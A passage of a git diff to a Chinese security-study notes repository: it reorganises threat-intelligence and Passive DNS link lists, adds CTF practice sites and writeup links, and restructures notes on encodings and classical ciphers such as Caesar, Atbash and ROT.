diff --git "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/BlueTeam/\347\233\221\345\257\237.md" "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/BlueTeam/\347\233\221\345\257\237.md"
index d05a4a91..6a33365f 100644
--- "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/BlueTeam/\347\233\221\345\257\237.md"
+++ "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/BlueTeam/\347\233\221\345\257\237.md"
@@ -17,7 +17,8 @@
* **[威胁情报](#威胁情报)**
* [平台](#平台)
* [域名监测](#域名监测)
- * [URL分析-PassiveDNS](#URL分析-PassiveDNS)
+ * [URL分析](#URL分析)
+ * [PassiveDNS](#PassiveDNS)
* **[安防设备](#安防设备)**
* [蜜罐](#蜜罐)
@@ -77,36 +78,44 @@
- [VenusEye威胁情报中心](https://www.venuseye.com.cn/)
- [ISC SANS威胁检测](https://isc.sans.edu/)
-## 域名监测
+## 钓鱼监测
- https://phishstats.info/ - 钓鱼网站收集
- https://www.phishtank.com/ - 钓鱼网站收集
- [x0rz/phishing_catcher](https://github.com/x0rz/phishing_catcher) - 以接近实时的方式捕获可疑的钓鱼域名
-## URL分析-PassiveDNS
+## URL分析
-Passive DNS 对安全研究非常重要,因为它可以在前期帮助我们构建出目标的基础设施结构,并且可以得到以下三方面的答案
-- 该域名曾经绑定过哪些IP
-- 这个IP有没有其他的域名
-- 该域名最早/最晚什么时候出现
-
-**资源**
- [VirusTotal](https://www.virustotal.com/gui/home/url)
-- [Scan your website - urlscan.io](https://urlscan.io/)
-- [Sucuri SiteCheck - Free Website Security Check & Malware Scanner](https://sitecheck.sucuri.net/)
-- [FREE Online Website Malware Scanner | Website Security Monitoring & Malware Removal | Quttera](https://quttera.com/)
-- [CheckPhish is AI Powered Free Phishing Detection tool](https://checkphish.ai/)
-- [恶意软件分析 & URL链接扫描 免费在线病毒分析平台 | 魔盾安全分析](https://www.maldun.com/analysis/)
-- [首页 - 微步在线威胁情报社区](https://x.threatbook.cn/)
-- [Threat Crowd | Threatcrowd.org Open Source Threat Intelligence](https://www.threatcrowd.org/)
-- [ThreatMiner.org | Data Mining for Threat Intelligence](https://www.threatminer.org/)
-- [Cisco Talos Intelligence Group - Comprehensive Threat Intelligence](https://talosintelligence.com/)
-- [avfisher.win url scan | Free Url Scanner & Phishing Detection | CheckPhish](https://checkphish.ai/domain/avfisher.win)
-- [Website Traffic, Statistics and Analytics - Alexa](https://www.alexa.com/siteinfo)
+- [urlscan.io](https://urlscan.io/) - 网站扫描器
+- [Sucuri SiteCheck](https://sitecheck.sucuri.net/) - 免费网站安全检查和恶意软件扫描器
+- [Quttera](https://quttera.com/) - 网站安全监控和恶意软件清除
+- [魔盾安全分析](https://www.maldun.com/analysis/) - 恶意软件分析 & URL链接扫描 免费在线病毒分析平台
+- [微步在线威胁情报社区](https://x.threatbook.cn/)
+- [Threat Crowd](https://www.threatcrowd.org/) - 开源威胁情报
+- [ThreatMiner.org](https://www.threatminer.org/) - 用于威胁情报的数据挖掘系统
+- [Cisco Talos Intelligence Group](https://talosintelligence.com/) - 综合威胁情报系统
+- [CheckPhish](https://checkphish.ai/domain/avfisher.win) - 免费的URL扫描器和网络钓鱼检测器
+- [Alexa](https://www.alexa.com/siteinfo) - 网站流量、统计和分析
- [Domain Dossier - Investigate domains and IP addresses, get owner and registrar information, see whois and DNS records](https://centralops.net/co/DomainDossier.aspx?dom_whois=1&net_whois=1&dom_dns=1)
-- [Free Domain SEO Analysis Tool | Check SEO Metrics - Moz](https://moz.com/domain-analysis)
+- [Moz](https://moz.com/domain-analysis) - Free Domain SEO Analysis Tool
- [Intelligence X](https://intelx.io/)
- [RiskIQ Community Edition](https://community.riskiq.com/)
+
+## IP分析
+
+- [VirusTotal](https://www.virustotal.com/gui/home/search)
+- [AbuseIPDB](https://www.abuseipdb.com/) - IP 地址威胁情报库
+- [微步在线威胁情报社区](https://x.threatbook.cn/)
+
+## PassiveDNS
+
+Passive DNS 对安全研究非常重要,因为它可以在前期帮助我们构建出目标的基础设施结构,并且可以得到以下三方面的答案
+1. 该域名曾经绑定过哪些 IP
+2. 这个 IP 有没有其他的域名
+3. 该域名最早/最晚什么时候出现
+
+**相关资源**
- [CIRCL » Passive DNS](https://www.circl.lu/services/passive-dns/)
- [JustinAzoff/bro-pdns](https://github.com/JustinAzoff/bro-pdns)
- [建立你自己的Passive DNS收集系统](https://www.freebuf.com/articles/network/103815.html)
diff --git "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/CTF.md" "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/CTF.md"
index 800e3fbc..8812b6f2 100644
--- "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/CTF.md"
+++ "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/CTF.md"
@@ -12,14 +12,12 @@
- https://www.ichunqiu.com/battalion?t=1
- http://ctf.bugku.com/
- http://www.hetianlab.com/CTFrace.html
-- http://www.shiyanbar.com/ctf/practice
- https://www.wechall.net/
- https://ctftime.org/
- https://pwnhub.cn/index
-- http://ctf.nuptzj.cn/
-- https://www.xctf.org.cn/
- http://hackinglab.cn/
- https://new.bugku.com/
+- https://buuoj.cn/
**学习资源**
- https://cgctf.nuptsast.com/login
@@ -40,6 +38,10 @@
**基础知识**
- [Crypto 笔记](./Crypto.md)
+**writup**
+- [IDF实验室-特殊的日子](https://blog.csdn.net/ab748998806/article/details/46382017) - 知识点 : CRC
+- [曼切斯特与差分曼切斯特](https://skysec.top/2017/07/10/%E6%9B%BC%E5%88%87%E6%96%AF%E7%89%B9%E4%B8%8E%E5%B7%AE%E5%88%86%E6%9B%BC%E5%88%87%E6%96%AF%E7%89%B9/) - 知识点 : 曼切斯特编码与差分曼切斯特编码
+
---
# Misc
@@ -51,13 +53,25 @@
- foremost - 文件分离工具
- kali 自带, `foremost -i 1.png`
+---
+
### 流量包取证
+
**流量包取证专用工具**
- Wireshark
- [Wireshark 笔记](../工具/Wireshark.md)
---
+### 压缩包取证
+
+**密码爆破工具**
+- [pyrofex/breakzip](https://gitlab.com/pyrofex/breakzip) - 用于破解使用弱加密的加密压缩文件的实用工具。
+- Advanced Archive Password Recovery - 一个灵活的,适用于 ZIP 和 RAR 档案的高度优化的口令恢复工具。
+- Ziperello - zip 爆破工具
+
+---
+
## 隐写
### 图片隐写
@@ -65,6 +79,7 @@
- [CTF中常见图片隐写](http://zjw.dropsec.xyz/uncategorized/2016/08/18/CTF%E4%B8%AD%E5%B8%B8%E8%A7%81%E5%9B%BE%E7%89%87%E9%9A%90%E5%86%99.html)
- [隐写术总结](http://drops.xmd5.com/static/drops/tips-4862.html)
- [Steganography](http://datagenetics.com/blog/march12012/index.html)
+- [misc-stegaBasic](https://www.jianshu.com/p/fe7a5fff2a95)
**图片隐写通用工具**
- Stegsolve - 隐写图片查看的利器
@@ -90,6 +105,8 @@
#### LSB隐写
+> LSB(英文 least significant bit)即最低有效位,位于二进制数的最右侧。图像的每一个像素点都是由RGB(红、绿、蓝)三原色组成,每个颜色占8位(如#FFFFFF)。由于修改最后1位对人眼不敏感,这样一个像素点就可以携带3位信息。应用LSB算法的图像格式需为无损压缩数据格式,例如图像中的bmp、png格式和音频的wav格式。
+
**LSB隐写专用工具**
- [livz/cloacked-pixel](https://github.com/livz/cloacked-pixel) - LSB 隐写和检测
- [RobinDavid/LSB-Steganography](https://github.com/RobinDavid/LSB-Steganography) - 使用最低有效位将隐写文件转换为图像。
@@ -140,6 +157,8 @@
- [网鼎杯 2020 Web Writeup](https://www.xmsec.cc/wang-ding-bei-2020-web-writeup/)
- [网鼎杯青龙组2020部分题解](https://www.cnblogs.com/kevinbruce656/p/12869764.html)
- [网鼎杯 2020 第一场 signal writeup](http://dreamcracker.today/2020/05/11/%e7%bd%91%e9%bc%8e%e6%9d%af-2020-%e7%ac%ac%e4%b8%80%e5%9c%ba-signal-writeup/)
+ - [2020-网鼎杯(青龙组)-Web题目-AreUserialz Writeup](https://mp.weixin.qq.com/s/16QfU8lZYChSckJWtcLiqg)
+ - [网鼎杯-青龙组web题目writeup](https://mp.weixin.qq.com/s/E-lRUm1zPkEIxSoV7cHfow)
- 白虎组
- [2020年第二届“网鼎杯”网络安全大赛 白虎组 部分题目Writeup](https://codingnote.cc/p/113802)
@@ -152,6 +171,26 @@
- [网鼎杯CTF——白虎组 (week 4) ](https://l0x1c.github.io/2020/05/15/2020-5-14/#HERO)
- [[原创]网鼎杯2020 白虎组 CY 解题](https://bbs.pediy.com/thread-259529.htm)
- [网鼎杯白虎组部分题目复盘](https://www.secquan.org/Notes/1071122)
+ - [网鼎杯2020白虎组Misc题目hidden总结](https://mp.weixin.qq.com/s/G1NttGYTUsQ1i8wNJQ667g)
+ - [网鼎杯-白虎组web题目writeup](https://mp.weixin.qq.com/s/v2C4BtZSYJDT64_ByrDhoA)
+
+- 朱雀组
+ - [2020网鼎杯朱雀组云顿WP(入门向)](https://mp.weixin.qq.com/s/TpKXezPMZLx3VlejxlFyiQ)
+ - [【网鼎杯2020朱雀组】Web WriteUp](https://www.cnblogs.com/vege/p/12907941.html)
+ - [[re]go语言逆向:2020网鼎杯朱雀组re what wp](https://blog.csdn.net/Breeze_CAT/article/details/106195499)
+ - [2020网鼎杯朱雀组_PHPweb](https://blog.csdn.net/gd_9988/article/details/106181577)
+ - [2020网鼎杯-朱雀组-部分wp](https://www.anquanke.com/post/id/205578)
+ - [2020网鼎杯-朱雀组部分题目Writeup](https://www.kkzevip.com/?post=51)
+ - [2020网鼎杯-朱雀组-Crypto、Misc(带视频) ](https://mp.weixin.qq.com/s/XYkgD_5Y0FcgsNqRAb_1Yw)
+
+- 玄武组
+ - [网鼎杯2020-玄武组签到题](https://blog.csdn.net/slavik_/article/details/106264509)
+ - [网鼎杯玄武组部分web题解](https://mp.weixin.qq.com/s/Kr2AlygNpeM7UYiLPINcrA)
+ - [网鼎杯-玄武组-writeup-简单思路讲究](https://mp.weixin.qq.com/s/PlpG6maNObxvRaXuaVSwIA)
+ - [2020网鼎杯玄武组_babyvm](https://bbs.pediy.com/thread-259714.htm)
+ - [2020网鼎杯玄武组部分题writeup(签到/vulcrack/java/js_on)](https://blog.csdn.net/w1590191166/article/details/106314499/)
+ - [2020网鼎杯-玄武组-部分WriteUp](https://mp.weixin.qq.com/s/xNDUYkxCIEJuvHJWQwtflw)
+ - [【CTF】网鼎杯【玄武组】CTF部分题](https://blog.csdn.net/God_XiangYu/article/details/106306773)
**2018**
- 青龙组
diff --git "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/Crypto.md" "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/Crypto.md"
index e1ab6bf1..ae4be2c9 100644
--- "a/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/Crypto.md"
+++ "b/1earn/\345\256\211\345\205\250/\347\254\224\350\256\260/Crypto.md"
@@ -13,18 +13,18 @@
# 大纲
* **常见编码**
- * [ASCII](#ASCII)
- * [Base](#Base)
- * [Base64/32/16](#Base643216)
+ * [ASCII](#ascii)
+ * [Base](#base)
+ * [Base64/32/16](#base643216)
* [base92](#base92)
- * [Escape/Unescape](#EscapeUnescape)
- * [HtmlEncode](#HtmlEncode)
- * [Quoted-printable](#Quoted-printable)
- * [Unicode](#Unicode)
- * [URL](#URL)
- * [UTF](#UTF)
- * [UUencode](#UUencode)
- * [XXencode](#XXencode)
+ * [Escape/Unescape](#escapeunescape)
+ * [HtmlEncode](#htmlencode)
+ * [Quoted-printable](#quoted-printable)
+ * [Unicode](#unicode)
+ * [URL](#url)
+ * [UTF](#utf)
+ * [UUencode](#uuencode)
+ * [XXencode](#xxencode)
* [shellcode](#shellcode)
* [进制](#进制)
* [敲击码](#敲击码)
@@ -33,16 +33,16 @@
* [条形码](#条形码)
* [二维码](#二维码)
* [汉信码](#汉信码)
- * [PDF147](#PDF147)
+ * [PDF147](#pdf147)
* **现代密码**
- * [AES](#AES)
- * [MD5](#MD5)
+ * [AES](#aes)
+ * [MD5](#md5)
* [rc4](#rc4)
- * [RIPE_MD160](#RIPE_MD160)
- * [RSA](#RSA)
- * [SHA](#SHA)
- * [SM国密](#SM国密)
+ * [RIPE_MD160](#ripe_md160)
+ * [RSA](#rsa)
+ * [SHA](#sha)
+ * [SM](#sm)
* **古典密码**
* [换位加密](#换位加密)
@@ -50,22 +50,20 @@
* [曲路密码](#曲路密码)
* [列移位密码](#列移位密码)
* [替换加密](#替换加密)
- * [ADFGX](#ADFGX)
- * [Bazeries](#Bazeries)
- * [Digrafid](#Digrafid)
- * [Porta](#Porta)
- * [ROT5/13/18/47](#ROT5131847)
- * [摩斯电码](#摩斯电码)
- * [查尔斯加密](#查尔斯加密)
+ * [ADFGX](#adfgx)
+ * [Bazeries](#bazeries)
+ * [Digrafid](#digrafid)
+ * [Porta](#porta)
+ * [ROT](#rot)
* [埃特巴什码](#埃特巴什码)
+ * [查尔斯加密](#查尔斯加密)
* [凯撒密码](#凯撒密码)
+ * [摩斯电码](#摩斯电码)
* [简单替换密码](#简单替换密码)
* [希尔密码](#希尔密码)
- * [猪圈密码](#猪圈密码)
* [波利比奥斯方阵密码](#波利比奥斯方阵密码)
* [夏多密码](#夏多密码)
* [普莱菲尔密码](#普莱菲尔密码)
- * [维吉尼亚密码](#维吉尼亚密码)
* [自动密钥密码](#自动密钥密码)
* [博福特密码](#博福特密码)
* [滚动密钥密码](#滚动密钥密码)
@@ -82,11 +80,13 @@
* [比尔密码](#比尔密码)
* [键盘密码](#键盘密码)
* [恩尼格玛密码](#恩尼格玛密码)
+ * [维吉尼亚密码](#维吉尼亚密码)
+ * [猪圈密码](#猪圈密码)
* **其他编码**
- * [Brainfuck](#Brainfuck)
- * [JSfuck](#JSfuck)
- * [JS加密/解密](#JS加密解密)
+ * [Brainfuck](#brainfuck)
+ * [JSfuck](#jsfuck)
+ * [JS加密/解密](#js加密解密)
* [颜文字加密](#颜文字加密)
* [与佛论禅](#与佛论禅)
* [文本加密为汉字](#文本加密为汉字)
@@ -112,14 +112,10 @@
- [gchq/CyberChef](https://github.com/gchq/CyberChef) - 一个用于加密、编码、压缩和数据分析的网络应用
- [guyoung/CaptfEncoder](https://github.com/guyoung/CaptfEncoder) - 一款跨平台网络安全工具套件
- [lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom) - 密码学的瑞士军刀
+- [Acmesec/CTFCrackTools](https://github.com/Acmesec/CTFCrackTools) - CTF工具框架
**在线工具**
-- http://tool.bugku.com/
-- http://ctf.ssleye.com/
-- https://ctftools.com/down/
-- https://gchq.github.io/CyberChef/
-- https://www.sojson.com/encrypt/
-- https://cryptii.com/
+- [Crypto在线工具](../../Plan/Web-Tools.md#Crypto)
---
@@ -166,27 +162,6 @@
---
-**功能类**
-- 数学
- - https://zh.numberempire.com/factoringcalculator.php
- - http://atool.org/quality_factor.php
- - https://zh.numberempire.com/
- - https://www.logcalculator.net/
-
-- 大小写
- - http://www.convertstring.com/zh_CN/StringFunction/ToUpperCase
- - http://www.convertstring.com/zh_CN/StringFunction/ToLowerCase
- - https://convertcase.net/
-
-- 反向
- - http://www.convertstring.com/zh_CN/StringFunction/ReverseString
- - https://www.qqxiuzi.cn/zh/daoxu/
-
-- 时间戳
- - http://tool.chinaz.com/tools/unixtime.aspx
-
----
-
# 常见编码
`更多内容可以参考` [字符编码](../../开发/字符编码/字符编码.md#编码)
@@ -212,7 +187,7 @@ ASCII编码对应十进制:
对应可以转换成二进制,八进制,十六进制等.
**在线工具**
-- http://www.ab126.com/goju/1711.html
+- [ASCII转换在线工具](../../Plan/Web-Tools.md#ASCII转换)
---
@@ -237,20 +212,7 @@ base64、base32、base16 可以分别编码转化8位字节为6位、5位、4位
```
**在线工具**
-
-32
-- http://tomeko.net/online_tools/base32.php
-
-64
-- http://tool.chinaz.com/Tools/Base64.aspx
-- https://base64.supfree.net/
-- http://www1.tc711.com/tool/BASE64.htm
-- http://decodebase64.com/
-- http://web.chacuo.net/charsetbase64
-- https://www.base64decode.org/
-
-base16
-- https://www.qqxiuzi.cn/bianma/base.php?type=16
+- [Base转换在线工具](../../Plan/Web-Tools.md#Base)
---
@@ -259,7 +221,7 @@ base16
- https://github.com/thenoviceoof/base92
**在线工具**
-- http://ctf.ssleye.com/base92.html
+- [Base转换在线工具](../../Plan/Web-Tools.md#Base)
---
@@ -299,7 +261,7 @@ ISO-8859-1 的较高部分(从 160 到 255 之间的代码)全都有实体名称
`>` | greater-than| `>`| `>`
**在线工具**
-- http://www.convertstring.com/zh_CN/EncodeDecode/HtmlEncode
+- [HtmlEncode转换在线工具](../../Plan/Web-Tools.md#HTML编码)
---
@@ -338,8 +300,7 @@ rawurlencode($string)));
一个函数就可以,将所有字符串urlencode转换后,%号替换为"="号,然后对非\r\n超过73连续字符,后面加一个=\r\n.这个是简单实现方法.按照该编码详细说明里面,有些空格、换行,还有一些特殊字符可以不用转换.不过一起转换了,也不会有影响
**在线工具**
-- http://web.chacuo.net/charsetquotedprintable
-- http://www.mxcz.net/tools/QuotedPrintable.aspx
+- [Quoted-Printable转换在线工具](../../Plan/Web-Tools.md#Quoted-Printable)
---
@@ -358,8 +319,7 @@ Unicode 编码有以下四种编码方式:
>> \U+ [Hex]: \U+0054\U+0068\U+0065
**在线工具**
-- http://tool.chinaz.com/tools/unicode.aspx
-- http://www.mxcz.net/tools/Unicode.aspx
+- [Unicode编码在线转换工具](../../Plan/Web-Tools.md#Unicode编码)
---
@@ -376,18 +336,14 @@ url 编码又叫百分号编码,是统一资源定位(URL)编码方式.URL地址
>%54%68%65%20%71%75%69%63%6b%20%62%72%6f%77%6e%20%66%6f%78%20%6a%75%6d%70%73%20%6f%76%65%72%20%74%68%65%20%6c%61%7a%79%20%64%6f%67
**在线工具**
-- http://web.chacuo.net/charseturlencode
-- https://meyerweb.com/eric/tools/dencoder/
-- http://tool.oschina.net/encode?type=4
-- http://www.mxcz.net/tools/Url.aspx
+- [url编码在线转换工具](../../Plan/Web-Tools.md#url编码)
---
## UTF
**在线工具**
-- http://tool.chinaz.com/Tools/UTF-8.aspx
-- http://tool.oschina.net/encode?type=2
+- [utf编码在线转换工具](../../Plan/Web-Tools.md#utf)
---
@@ -400,8 +356,7 @@ UUencode 是一种二进制到文字的编码,最早在 unix 邮件系统中使
> 编码后: `M5&AE('%U:6-K(&)R;W=N(&9O>"!J=6UP hJ4VZ653pOKBf647mPrRi64NjS0-eRKpkQm-jRaJm65FcNG-gMLdt64FjNkc+
**在线工具**
-- http://web.chacuo.net/charsetxxencode
+- [XXencode编码在线转换工具](../../Plan/Web-Tools.md#XXencode编码)
---
@@ -438,12 +393,7 @@ XXencode 将输入文本以每三个字节为单位进行编码.如果最后剩
## 进制
**在线工具**
-- https://js.tuisec.win/convert/ox2str/
-- http://www.5ixuexiwang.com/str/from-hex.php
-- http://www.convertstring.com/zh_CN/EncodeDecode/HexDecode
-- http://www.5ixuexiwang.com/str/hex.php
-- http://tool.oschina.net/hexconvert/
-- http://www.mxcz.net/tools/Hex.aspx
+- [进制在线转换工具](../../Plan/Web-Tools.md#进制)
---
@@ -460,7 +410,7 @@ XXencode 将输入文本以每三个字节为单位进行编码.如果最后剩
## 曼彻斯特编码
-**文章**
+**科普介绍**
- [曼彻斯特编码](https://zh.wikipedia.org/wiki/%E6%9B%BC%E5%BD%BB%E6%96%AF%E7%89%B9%E7%BC%96%E7%A0%81)
在电信与数据存储中, 曼彻斯特编码(Manchester coding),又称自同步码、相位编码(phase encoding,PE),能够用信号的变化来保持发送设备和接收设备之间的同步.
@@ -511,16 +461,17 @@ XXencode 将输入文本以每三个字节为单位进行编码.如果最后剩
### 二维码
-**在线工具**
-- http://tool.chinaz.com/qrcode/
-- http://jiema.wwei.cn/
-- https://cli.im/
-- https://www.beaconstac.com/qr-code-generator
+**在线制作/识别二维码工具**
+- [二维码在线制作/识别工具](../../Plan/Web-Tools.md#二维码)
+
+**二维码分析与恢复工具包**
+- [Merricx/qrazybox](https://github.com/Merricx/qrazybox)
+ - 在线使用 : https://merricx.github.io/qrazybox/
### 汉信码
-**在线工具**
-- http://www.efittech.com/hxdec.html
+**在线识别汉信码工具**
+- [汉信码在线识别工具](../../Plan/Web-Tools.md#汉信码)
### PDF147
@@ -538,18 +489,15 @@ XXencode 将输入文本以每三个字节为单位进行编码.如果最后剩
- [这些hash你了解吗?](http://www.myh0st.cn/index.php/archives/304/)
**在线工具**
-- http://tool.oschina.net/encrypt/
-- http://encode.chahuo.com/
-- http://tool.chacuo.net/cryptdes
-- http://www.mxcz.net/tools/MD5.aspx
-- https://hashtoolkit.com/
+
+- [现代密码在线工具](../../Plan/Web-Tools.md#现代密码)
---
## AES
**在线工具**
-- [AES Encryption – Easily encrypt or decrypt strings or files](http://aes.online-domain-tools.com/)
+- [AES在线工具](../../Plan/Web-Tools.md#AES)
---
@@ -561,40 +509,21 @@ XXencode 将输入文本以每三个字节为单位进行编码.如果最后剩
- [MD5碰撞的一些例子](https://www.jianshu.com/p/c9089fd5b1ba)
**在线工具**
-- https://md5.navisec.it/
-- https://www.somd5.com/
-- https://www.md5online.org/
-- https://www.somd5.com/batch.html
-- http://md5.tellyou.top/
-- http://www.cmd5.com/
-- http://hashtoolkit.com/
-- http://hashcrack.com/
-- https://md5.gromweb.com/
-- http://tool.chinaz.com/Tools/MD5.aspx
-- http://www.chamd5.org/
-- https://cmd5.la/
-- http://pmd5.com/
-- http://www.ttmd5.com/
-- http://www.xmd5.org/
-- https://crackstation.net/
-- http://www.md5this.com/index.php
-- https://md5online.org/
-- http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php
+- [MD5在线工具](../../Plan/Web-Tools.md#MD5)
---
## rc4
**在线工具**
-- https://www.sojson.com/encrypt_rc4.html
-- http://tool.chacuo.net/cryptrc4
+- [rc4在线工具](../../Plan/Web-Tools.md#rc4)
---
## RIPE_MD160
**在线工具**
-- http://www.convertstring.com/zh_CN/Hash/RIPE_MD160
+- [RIPE_MD160在线工具](../../Plan/Web-Tools.md#RIPE_MD160)
---
@@ -615,14 +544,11 @@ XXencode 将输入文本以每三个字节为单位进行编码.如果最后剩
- [SHA1 collider](https://alf.nu/SHA1)
**在线工具**
-- [SHA1哈希 - 在线SHA1散列发生器](http://www.convertstring.com/zh_CN/Hash/SHA1)
-- [SHA256哈希 - 在线SHA256哈希发生器](http://www.convertstring.com/zh_CN/Hash/SHA256)
-- [SHA384哈希 - 在线SHA384哈希发生器](http://www.convertstring.com/zh_CN/Hash/SHA384)
-- [SHA512哈希 - 在线SHA512哈希发生器](http://www.convertstring.com/zh_CN/Hash/SHA512)
+- [SHA在线工具](../../Plan/Web-Tools.md#SHA)
---
-## SM国密
+## SM
国密即国家密码局认定的国产密码算法.主要有 SM1,SM2,SM3,SM4.密钥长度和分组长度均为 128 位.
- SM1 为对称加密.其加密强度与 AES 相当.该算法不公开,调用该算法时,需要通过加密芯片的接口进行调用.
@@ -737,6 +663,9 @@ ADFGVX 密码实际上就是 ADFGX 密码的扩充升级版,一样具有 ADFGX
加密过程完全类似
+**在线工具**
+- [ADFGX在线工具](../../Plan/Web-Tools.md#ADFGX)
+
---
### Bazeries
@@ -850,9 +779,9 @@ Porta 密码可以被以 维吉尼亚密码 破解相类似方式进行自动攻
---
-### ROT5/13/18/47
+### ROT
-ROT5/13/18/47是一种简单的码元位置顺序替换暗码.此类编码具有可逆性,可以自我解密,主要用于应对快速浏览,或者是机器的读取.
+ROT5/13/18/47 是一种简单的码元位置顺序替换暗码.此类编码具有可逆性,可以自我解密,主要用于应对快速浏览,或者是机器的读取.
ROT5 是 rotate by 5 places 的简写,意思是旋转5个位置,其它皆同.下面分别说说它们的编码方式:
@@ -869,9 +798,50 @@ ROT47:对数字、字母、常用符号进行编码,按照它们的ASCII值进
> 密文: gur dhvpx oebja sbk whzcf bire gur ynml qbt
**在线工具**
-- https://www.qqxiuzi.cn/bianma/ROT5-13-18-47.php
-- http://www.mxcz.net/tools/rot13.aspx
-- https://www.rot13.com/
+- [ROT在线工具](../../Plan/Web-Tools.md#ROT)
+
+---
+
+### 埃特巴什码
+
+埃特巴什码(Atbash Cipher)是一种以字母倒序排列作为特殊密钥的替换加密,也就是下面的对应关系:
+
+ABCDEFGHIJKLMNOPQRSTUVWXYZ
+
+ZYXWVUTSRQPONMLKJIHGFEDCBA
+
+差不多就是把A换成Z,Z换成A
+> 明文: the quick brown fox jumps over the lazy dog
+
+> 密文: gsv jfrxp yildm ulc qfnkh levi gsv ozab wlt
+
+---
+
+### 查尔斯加密
+
+`playfair`
+
+**在线工具**
+- [查尔斯加密在线工具](../../Plan/Web-Tools.md#查尔斯加密)
+
+---
+
+### 凯撒密码
+
+凯撒密码(Caesar Cipher或称恺撒加密、恺撒变换、变换加密、位移加密)是一种替换加密,明文中的所有字母都在字母表上向后(或向前)按照一个固定数目进行偏移后被替换成密文.例,当偏移量是3的时候,所有的字母A将被替换成D,B变成E,以此类推.
+
+实例:
+
+> 明文: The quick brown fox jumps over the lazy dog
+
+> 偏移量:1
+
+> 密文: Uif rvjdl cspxo gpy kvnqt pwfs uif mbaz eph
+
+![](../../../assets/img/安全/笔记/Crypto/凯撒密码参照表.jpg)
+
+**在线工具**
+- [凯撒密码在线工具](../../Plan/Web-Tools.md#凯撒密码)
---
@@ -907,58 +877,7 @@ M -- |Z --.. |= -...-
> 编码后:- .... . / --.- ..- .. -.-. -.- / -... .-. --- .-- -. / ..-. --- -..- / .--- ..- -- .--. ... / --- ...- . .-. / - .... . / .-.. .- --.. -.-- / -.. --- --.
**在线工具**
-- http://rumkin.com/tools/cipher/morse.php
-- https://morsecode.scphillips.com/translator.html
-- https://morsify.net/
-- http://www.atool.org/morse.php
-- http://www.zou114.com/mesm/
-- http://zhongguosou.com/zonghe/moErSiCodeConverter.aspx
-- https://www.jb51.net/tools/morse.htm
-
----
-
-### 查尔斯加密
-
-`playfair解密`
-
-**在线工具**
-- http://rumkin.com/tools/cipher/playfair.php
-
----
-
-### 埃特巴什码
-
-埃特巴什码(Atbash Cipher)是一种以字母倒序排列作为特殊密钥的替换加密,也就是下面的对应关系:
-
-ABCDEFGHIJKLMNOPQRSTUVWXYZ
-
-ZYXWVUTSRQPONMLKJIHGFEDCBA
-
-差不多就是把A换成Z,Z换成A
-> 明文: the quick brown fox jumps over the lazy dog
-
-> 密文: gsv jfrxp yildm ulc qfnkh levi gsv ozab wlt
-
----
-
-### 凯撒密码
-
-凯撒密码(Caesar Cipher或称恺撒加密、恺撒变换、变换加密、位移加密)是一种替换加密,明文中的所有字母都在字母表上向后(或向前)按照一个固定数目进行偏移后被替换成密文.例,当偏移量是3的时候,所有的字母A将被替换成D,B变成E,以此类推.
-
-实例:
-
-> 明文: The quick brown fox jumps over the lazy dog
-
-> 偏移量:1
-
-> 密文: Uif rvjdl cspxo gpy kvnqt pwfs uif mbaz eph
-
-![](../../../assets/img/安全/笔记/Crypto/凯撒密码参照表.jpg)
-
-**在线工具**
-- https://www.xarg.org/tools/caesar-cipher/
-- https://planetcalc.com/1434/
-- http://www.zjslove.com/3.decode/kaisa/index.html
+- [摩斯电码在线工具](../../Plan/Web-Tools.md#摩斯电码)
---
@@ -989,30 +908,6 @@ ZYXWVUTSRQPONMLKJIHGFEDCBA
---
-### 猪圈密码
-
-猪圈密码(Pigpen Cipher或称九宫格密码、朱高密码、共济会密码或共济会员密码),是一种以格子为基础的简单替代式密码.
-
-![](../../../assets/img/安全/笔记/Crypto/猪圈密码.jpg)
-
-变种
-
-圣堂武士密码(Templar Cipher)是共济会的"猪圈密码"的一个变种,一直被共济会圣殿骑士用.
-
-![](../../../assets/img/安全/笔记/Crypto/templar_cipher.png)
-
-**OTHER CIPHER**
-
-![](../../../assets/img/安全/笔记/Crypto/othercipher1.png)
-![](../../../assets/img/安全/笔记/Crypto/othercipher2.png)
-![](../../../assets/img/安全/笔记/Crypto/othercipher3.png)
-![](../../../assets/img/安全/笔记/Crypto/othercipher4.png)
-
-**在线工具**
-- http://www.simonsingh.net/The_Black_Chamber/pigpen.html
-
----
-
### 波利比奥斯方阵密码
波利比奥斯方阵密码(`Polybius Square Cipher`或称`波利比奥斯棋盘`)是棋盘密码的一种,是利用波利比奥斯方阵进行加密的密码方式,简单的来说就是把字母排列好,用坐标(行列)的形式表现出来.字母是密文,明文便是字母的坐标.
@@ -1081,39 +976,6 @@ THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG 和密钥 CULTURE 为例来讲解.
---
-### 维吉尼亚密码
-
-维吉尼亚密码(`Vigenère Cipher`)是在单一恺撒密码的基础上扩展出多表代换密码,根据密钥(当密钥长度小于明文长度时可以循环使用)来决定用哪一行的密表来进行替换,以此来对抗字频统计
-
-![](../../../assets/img/安全/笔记/Crypto/维吉尼亚密码密表.png)
-
-**已知秘钥加密解密**
-
-> 明文: THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG
->
->> 密钥(循环使用,密钥越长相对破解难度越大): CULTURE
->
->> 加密过程:如果第一行为明文字母,第一列为密钥字母,那么明文字母'T'列和密钥字母'C'行的交点就是密文字母'V',以此类推.
->
-> 密文: VBP JOZGM VCHQE JQR UNGGW QPPK NYI NUKR XFK
-
-**未知秘钥破解**
-
-破解维吉尼亚密码第一步是确定密钥长度,在确定密钥长度后就可以尝试确定密钥,通常我们可以使用 卡方检验 来找到每个字母的偏移量
-
-/////[URL](http://www.practicalcryptography.com/cryptanalysis/stochastic-searching/cryptanalysis-vigenere-cipher/)/////
-
-**变种**
-
